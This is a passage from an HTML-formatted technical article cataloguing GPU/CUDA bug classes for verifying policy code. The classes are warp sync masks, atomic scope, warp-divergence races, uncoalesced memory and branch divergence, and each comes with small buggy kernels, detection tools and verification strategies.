&lt;pre class="highlight cuda"&gt;&lt;code&gt;&lt;span class="k"&gt;__global__&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;k&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;out&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;lane&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;threadIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt; &lt;span class="mi"&gt;31&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;lane&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;16&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;__syncwarp&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mh"&gt;0xffffffff&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;  &lt;span class="c1"&gt;// only 16 lanes arrive, but mask expects all 32&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
  &lt;span class="n"&gt;out&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;threadIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;lane&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Seen in / checked by
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Compute Sanitizer &lt;code&gt;synccheck&lt;/code&gt; explicitly reports "Invalid arguments" and "Divergent thread(s) in warp" classes for these hazards.(&lt;a href="https://docs.nersc.gov/tools/debug/compute-sanitizer/" rel="noopener noreferrer"&gt;NERSC Documentation&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;iGUARD discusses how newer CUDA features (e.g., independent thread scheduling + cooperative groups) create new race/sync hazards beyond the classic model.(&lt;a href="https://akkamath.github.io/files/SOSP21_iGUARD.pdf" rel="noopener noreferrer"&gt;Aditya K Kamath&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Checking approach
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Runtime validation via &lt;code&gt;synccheck&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Static analysis to verify mask correctness at each &lt;code&gt;__syncwarp&lt;/code&gt; callsite.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Verification strategy
&lt;/h4&gt;

&lt;p&gt;If policies can ever emit warp-level sync or cooperative-groups barriers, require a &lt;em&gt;verifiable&lt;/em&gt; mask discipline: e.g., only &lt;code&gt;__syncwarp(0xffffffff)&lt;/code&gt; (full mask) or masks proven to equal the active mask at the callsite. Otherwise, simplest is: &lt;strong&gt;ban warp sync primitives entirely&lt;/strong&gt; inside policies.&lt;/p&gt;

&lt;h4&gt;
  
  
  Verification scope analysis
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Scope &amp;amp; Assurance&lt;/strong&gt;: Extension-local (E), By-construction. Banning &lt;code&gt;__syncwarp&lt;/code&gt;/CG barriers entirely (or requiring only full-mask sync at provably uniform points) makes invalid warp sync structurally impossible, providing perfect soundness with high completeness for policy use cases where warp-level sync is rarely needed.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Production guarantee&lt;/strong&gt;: Policy code cannot introduce invalid warp synchronization because the verifier bans warp-level sync primitives. If allowed, only full-mask &lt;code&gt;__syncwarp(0xffffffff)&lt;/code&gt; at provably uniform points is permitted.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Offline/CI tools&lt;/strong&gt;: Compute Sanitizer &lt;code&gt;synccheck&lt;/code&gt; reports invalid sync arguments and divergent warps at runtime; iGUARD provides NVBit-based instrumentation for detecting sync hazards from modern CUDA features.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Residual gap&lt;/strong&gt;: iGUARD notes that ITS (Independent Thread Scheduling) and CG (cooperative groups) are features that even experienced developers misuse, which creates new hazards. This justifies conservative restrictions: without complex ITS-aware analysis, banning these primitives in policy code is the only sound approach.&lt;/p&gt;




&lt;h3&gt;
  
  
  3) Insufficient Atomic/Sync Scope [Correctness, GPU-specific]
&lt;/h3&gt;

&lt;h4&gt;
  
  
  What it is / why it matters
&lt;/h4&gt;

&lt;p&gt;GPUs add &lt;em&gt;scope&lt;/em&gt; and memory-model subtleties that don't exist on CPUs. &lt;strong&gt;Scoped races&lt;/strong&gt; occur when synchronization/atomics are done at an insufficient scope (e.g., using &lt;code&gt;atomicAdd_block&lt;/code&gt; when &lt;code&gt;atomicAdd&lt;/code&gt; with device scope is needed). This is a distinct GPU bug class because scope semantics are unique to CUDA's memory model.&lt;/p&gt;

&lt;h4&gt;
  
  
  Bug example
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;&lt;span class="c1"&gt;// Scoped race: using block-scope atomic when device-scope is needed&lt;/span&gt;
&lt;span class="k"&gt;__global__&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;k&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;counter&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="n"&gt;atomicAdd_block&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;counter&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;  &lt;span class="c1"&gt;// only block-scope, may race across blocks&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Seen in / checked by
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;ScoRD introduces &lt;em&gt;scoped races&lt;/em&gt; due to insufficient scope and argues this is a distinct bug class.(&lt;a href="https://www.csa.iisc.ac.in/~arkapravab/papers/isca20_ScoRD.pdf" rel="noopener noreferrer"&gt;CSA - IISc Bangalore&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;iGUARD further targets races introduced by "scoped synchronization" and advanced CUDA features (independent thread scheduling, cooperative groups).(&lt;a href="https://akkamath.github.io/files/SOSP21_iGUARD.pdf" rel="noopener noreferrer"&gt;Aditya K Kamath&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Checking approach
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Scope verification:&lt;/strong&gt; ensure atomics/sync use sufficient scope for the access pattern.&lt;/li&gt;
&lt;li&gt;Require explicit scope annotations and validate against access patterns.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Verification strategy
&lt;/h4&gt;

&lt;p&gt;Treat scope as part of the verifier contract: if policies do atomic/synchronizing operations, require the &lt;em&gt;strongest&lt;/em&gt; allowed scope (or forbid nontrivial scope usage). Practically: ban cross-block shared global updates unless they're done through a small set of "safe" helpers (e.g., per-SM/per-warp buffers → host aggregation). If policies use scoped atomics, require the scope to be explicit and conservative.&lt;/p&gt;
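
&lt;p&gt;One way to picture "scope as part of the verifier contract" is as an ordering check. The sketch below is a host-side model under stated assumptions: the &lt;code&gt;Sharing&lt;/code&gt; descriptor and both function names are hypothetical, and the three scopes mirror CUDA's &lt;code&gt;atomicAdd_block&lt;/code&gt; / &lt;code&gt;atomicAdd&lt;/code&gt; / &lt;code&gt;atomicAdd_system&lt;/code&gt; variants.&lt;/p&gt;

```cpp
// Scopes ordered from narrowest to widest.
enum Scope { kBlockScope = 0, kDeviceScope = 1, kSystemScope = 2 };

// Hypothetical description of who may touch an object concurrently.
struct Sharing {
  bool shared_across_blocks;
  bool shared_with_host_or_peer;
};

// Narrowest scope that still covers every concurrent accessor.
constexpr Scope required_scope(Sharing s) {
  return s.shared_with_host_or_peer ? kSystemScope
         : s.shared_across_blocks   ? kDeviceScope
                                    : kBlockScope;
}

// An atomic is accepted only if its scope is at least the required one.
constexpr bool scope_sufficient(Scope used, Sharing s) {
  return used >= required_scope(s);
}

// The bug example: a block-scope atomic on a counter shared by all blocks.
static_assert(!scope_sufficient(kBlockScope, Sharing{true, false}),
              "block scope is too narrow for a cross-block counter");
static_assert(scope_sufficient(kDeviceScope, Sharing{true, false}),
              "device scope covers all blocks on the GPU");
```

&lt;p&gt;Defaulting every policy atomic to device scope amounts to never passing &lt;code&gt;kBlockScope&lt;/code&gt; as &lt;code&gt;used&lt;/code&gt;, which is why that choice needs no knowledge of the kernel's access pattern.&lt;/p&gt;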

&lt;h4&gt;
  
  
  Verification scope analysis
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Scope &amp;amp; Assurance&lt;/strong&gt;: Combined → Extension-local (C→E) via state isolation, Static-sound. If policies can touch kernel-shared global objects, scope correctness depends on kernel access patterns (Combined). However, this reduces to Extension-local by restricting policies to write only policy-owned state or requiring all atomics to use device-scope by default, providing strong soundness with medium completeness (policies needing block-scope atomics must use conservative device-scope).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Production guarantee&lt;/strong&gt;: Two design choices enable Extension-local verification: (A) The policy only writes policy-owned state (maps, ringbuffers), never kernel globals, so scope becomes irrelevant; (B) All policy atomics use device-scope by default, which is sufficient for any access pattern confined to a single GPU. Both approaches eliminate scope bugs without kernel inspection.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Offline/CI tools&lt;/strong&gt;: ScoRD introduces "scoped races" as a distinct bug class and provides detection (research prototype requiring hardware support); iGUARD targets races from scoped synchronization and advanced CUDA features via NVBit GPU-side runtime instrumentation.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Residual gap&lt;/strong&gt;: If policies must write kernel-shared objects with fine-grained scope optimization, Combined analysis or contracts are required. ScoRD and iGUARD emphasize that scope bugs are subtle and under-detected, so defaulting to device-scope is a sound engineering choice.&lt;/p&gt;




&lt;h3&gt;
  
  
  4) Warp-divergence Race [Correctness, GPU-specific]
&lt;/h3&gt;

&lt;h4&gt;
  
  
  What it is / why it matters
&lt;/h4&gt;

&lt;p&gt;A &lt;strong&gt;warp-divergence race&lt;/strong&gt; is a GPU-specific phenomenon where &lt;strong&gt;divergence changes which threads are effectively concurrent&lt;/strong&gt;, producing racy outcomes that don't map cleanly to CPU assumptions. SIMT execution order + reconvergence can create subtle concurrency patterns. This is one reason "CPU-style race reasoning" doesn't port directly to GPUs. While control-flow divergence is generally a performance issue (serialized execution paths), a warp-divergence race is a &lt;strong&gt;correctness&lt;/strong&gt; issue in which divergence creates unexpected concurrency patterns that lead to data races. The root cause is the same, but the failure modes differ: performance degradation vs. racy/undefined behavior.&lt;/p&gt;

&lt;h4&gt;
  
  
  Bug example
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;&lt;span class="k"&gt;__global__&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;k&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;A&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;lane&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;threadIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt; &lt;span class="mi"&gt;31&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;lane&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;16&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;A&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;      &lt;span class="c1"&gt;// first half writes&lt;/span&gt;
  &lt;span class="k"&gt;else&lt;/span&gt;           &lt;span class="n"&gt;A&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;      &lt;span class="c1"&gt;// second half writes&lt;/span&gt;
  &lt;span class="c1"&gt;// outcome depends on SIMT execution + reconvergence&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Seen in / checked by
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;GKLEE explicitly lists "warp-divergence race" among discovered bug classes.(&lt;a href="https://lingming.cs.illinois.edu/publications/icse2020b.pdf" rel="noopener noreferrer"&gt;Lingming Zhang&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;Simulee stresses CUDA-aware race definitions and discusses GPU-specific race interpretation constraints (e.g., avoiding false positives due to warp lockstep).(&lt;a href="https://zhangyuqun.github.io/publications/ase2019.pdf" rel="noopener noreferrer"&gt;zhangyuqun.github.io&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Checking approach
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Verifier rule:&lt;/strong&gt; treat "lane-divergent side effects" as forbidden unless proven safe.&lt;/li&gt;
&lt;li&gt;Require that any helper with side effects is guarded by a &lt;strong&gt;warp-uniform predicate&lt;/strong&gt; or executed only by a designated lane (e.g., lane0). Then the verifier only needs to prove &lt;strong&gt;uniformity&lt;/strong&gt; (or single-lane execution), not full SIMT interleavings.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Verification strategy
&lt;/h4&gt;

&lt;p&gt;Enforce warp-uniform control flow for policy side effects. If divergence is unavoidable, force "single-lane execution" patterns where only lane0 performs the side effect. This eliminates warp-divergence races by construction.&lt;/p&gt;

&lt;h4&gt;
  
  
  Verification scope analysis
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Scope &amp;amp; Assurance&lt;/strong&gt;: Extension-local (E), Static-sound. Warp-divergence races arise from SIMT execution semantics, but can be prevented by structural restrictions on policy code, providing strong soundness with medium completeness (legitimately safe lane-divergent writes are rejected).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Production guarantee&lt;/strong&gt;: The verifier enforces that all side-effecting operations are either (1) under warp-uniform predicates, or (2) executed only by lane0 (single-lane execution pattern). This eliminates warp-divergence races without analyzing the kernel. The verifier proves uniformity or single-lane execution statically.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Offline/CI tools&lt;/strong&gt;: GKLEE explicitly lists "warp-divergence race" among discovered bug classes and explores divergent execution paths via concolic/symbolic testing; Simulee uses CUDA-aware race definitions that account for warp lockstep behavior to avoid false positives.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Residual gap&lt;/strong&gt;: Policies with legitimately safe lane-divergent writes will be rejected. This trade-off is favorable because warp-divergence races are notoriously subtle (GKLEE found them in real SDK code), so eliminating them by construction is safer than complex SIMT interleaving analysis.&lt;/p&gt;




&lt;h3&gt;
  
  
  5) Uncoalesced / Non-Coalesceable Global Memory Access Patterns [Performance, GPU-specific]
&lt;/h3&gt;

&lt;h4&gt;
  
  
  What it is / why it matters
&lt;/h4&gt;

&lt;p&gt;Warp memory coalescing is a GPU-specific performance contract. "Uncoalesced" accesses can cause large slowdowns because a single warp-wide access is split into many memory transactions.&lt;/p&gt;

&lt;h4&gt;
  
  
  Bug example
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;&lt;span class="k"&gt;__global__&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;k&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;float&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;stride&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;tid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;blockIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;blockDim&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;threadIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="kt"&gt;float&lt;/span&gt; &lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;a&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;stride&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;   &lt;span class="c1"&gt;// stride&amp;gt;1 =&amp;gt; likely uncoalesced&lt;/span&gt;
  &lt;span class="n"&gt;a&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;stride&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="mf"&gt;1.0&lt;/span&gt;&lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Seen in / checked by
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;GPUDrano: "detects uncoalesced global memory accesses" and treats them as performance bugs.(&lt;a href="https://github.com/upenn-acg/gpudrano-static-analysis_v1.0" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;, &lt;a href="https://www.cis.upenn.edu/~alur/Cav17.pdf" rel="noopener noreferrer"&gt;CAV17&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;GKLEE: reports "non-coalesced memory accesses" as performance bugs it finds.(&lt;a href="https://lingming.cs.illinois.edu/publications/icse2020b.pdf" rel="noopener noreferrer"&gt;Lingming Zhang&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;GPUCheck: detects "non-coalesceable memory accesses."(&lt;a href="https://webdocs.cs.ualberta.ca/~amaral/thesis/TaylorLloydMSc.pdf" rel="noopener noreferrer"&gt;WebDocs&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Checking approach
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Static analysis (GPUDrano/GPUCheck-style):&lt;/strong&gt; analyze address expressions in terms of lane-to-address stride; flag when stride exceeds coalescing thresholds.(&lt;a href="https://www.cis.upenn.edu/~alur/Cav17.pdf" rel="noopener noreferrer"&gt;CAV17&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Verification strategy
&lt;/h4&gt;

&lt;p&gt;If you want "performance as correctness," this is a flagship rule: restrict policy memory ops to patterns provably coalesced (e.g., affine, lane-linear indexing with small stride), and/or require warp-level aggregation so only one lane performs global updates. Require map operations to use &lt;strong&gt;warp-uniform keys&lt;/strong&gt; or &lt;strong&gt;contiguous per-lane indices&lt;/strong&gt; (e.g., &lt;code&gt;base + lane_id&lt;/code&gt;), not random hashes. If policies must do random accesses, restrict them to &lt;strong&gt;lane0 only&lt;/strong&gt;, amortizing the uncoalesced behavior to 1 lane/warp.&lt;/p&gt;
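
&lt;p&gt;To make "lane-linear indexing with small stride" concrete, here is a host-side sketch that counts how many memory segments one warp touches for an access of the form &lt;code&gt;base + lane * stride&lt;/code&gt;. The assumptions are mine, not the tools': 32 lanes per warp, a segment-aligned base, a 128-byte transaction granularity, and a non-negative stride. The function names and the &lt;code&gt;max_segments&lt;/code&gt; threshold are hypothetical.&lt;/p&gt;

```cpp
constexpr int kWarpSize = 32;
constexpr int kSegmentBytes = 128;  // assumed transaction granularity

// Number of distinct segments touched when lane i accesses element
// i * stride_elems of an array whose base is segment-aligned.
// Assumes stride_elems >= 0, so segment ids never decrease with the lane id
// and counting the changes between neighbouring lanes is enough.
int segments_touched(int stride_elems, int elem_bytes) {
  int count = 1;     // lane 0 always touches segment 0
  int previous = 0;  // segment id seen by the previous lane
  for (int lane = 1; lane != kWarpSize; ++lane) {
    int segment = (lane * stride_elems * elem_bytes) / kSegmentBytes;
    if (segment != previous) {
      ++count;
      previous = segment;
    }
  }
  return count;
}

// Hypothetical verifier rule: accept only accesses that stay within a
// small number of segments per warp.
bool coalesced_enough(int stride_elems, int elem_bytes, int max_segments) {
  return max_segments >= segments_touched(stride_elems, elem_bytes);
}
```

&lt;p&gt;Under these assumptions a 4-byte access with stride 1 touches one segment, stride 2 touches two, and stride 32 touches 32, one per lane. A real verifier would also need to account for misaligned bases and the target architecture's sector size.&lt;/p&gt;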

&lt;h4&gt;
  
  
  Verification scope analysis
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Scope &amp;amp; Assurance&lt;/strong&gt;: Extension-local (E) for policy-owned memory; Combined (C) for kernel arrays. Static-sound for policy memory: affine/lane-linear indexing guarantees coalescing with strong soundness but low completeness (random-access patterns rejected; kernel-array reads require Combined analysis).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Production guarantee&lt;/strong&gt;: For policy-owned memory (maps, ringbuffers), restricting index expressions to affine/lane-linear forms (&lt;code&gt;base + lane_id&lt;/code&gt;) or lane0-only access provides bounded overhead guarantees. Warp-level aggregation (only lane0 performs global updates) amortizes uncoalesced behavior to 1 lane/warp. The verifier cannot guarantee coalescing for kernel-array reads without kernel knowledge.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Offline/CI tools&lt;/strong&gt;: GPUDrano statically detects uncoalesced global memory accesses and treats them as performance bugs; GPUCheck identifies non-coalesceable access patterns via thread-divergent expression analysis; GKLEE reports "non-coalesced memory accesses" as performance bugs via symbolic exploration.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Residual gap&lt;/strong&gt;: True coalescing depends on hardware cache behavior and concurrent workloads, and "is it really slow / how slow" is architecture-dependent. Static analysis therefore provides sound-ish structural guarantees and warnings rather than tight performance bounds.&lt;/p&gt;




&lt;h3&gt;
  
  
  6) Control-Flow Divergence (warp branch divergence) [Performance, GPU-specific]
&lt;/h3&gt;

&lt;h4&gt;
  
  
  What it is / why it matters
&lt;/h4&gt;

&lt;p&gt;SIMT divergence serializes paths within a warp, lowering "branch efficiency" and increasing worst-case overhead. This entry focuses on divergence as a &lt;strong&gt;performance&lt;/strong&gt; issue. However, divergence is also the root cause of more severe correctness bugs: barrier divergence (deadlock when barriers are in conditional code) and warp-divergence races (unexpected concurrency patterns leading to data races).&lt;/p&gt;

&lt;h4&gt;
  
  
  Bug example
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;&lt;span class="k"&gt;__global__&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;k&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;float&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;out&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;float&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;in&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;tid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;blockIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;blockDim&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;threadIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;out&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;in&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="k"&gt;else&lt;/span&gt;                &lt;span class="n"&gt;out&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;in&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;  &lt;span class="c1"&gt;// divergence within warp&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Seen in / checked by
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;GPUCheck explicitly targets "branch divergence" as a performance problem arising from thread-divergent expressions.(&lt;a href="https://webdocs.cs.ualberta.ca/~amaral/thesis/TaylorLloydMSc.pdf" rel="noopener noreferrer"&gt;WebDocs&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;GKLEE: "divergent warps" as performance bugs.(&lt;a href="https://lingming.cs.illinois.edu/publications/icse2020b.pdf" rel="noopener noreferrer"&gt;Lingming Zhang&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;Wu et al.: "non-optimal implementation" includes performance loss causes like branch divergence.(&lt;a href="https://arxiv.org/pdf/1905.01833" rel="noopener noreferrer"&gt;arXiv&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Checking approach
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
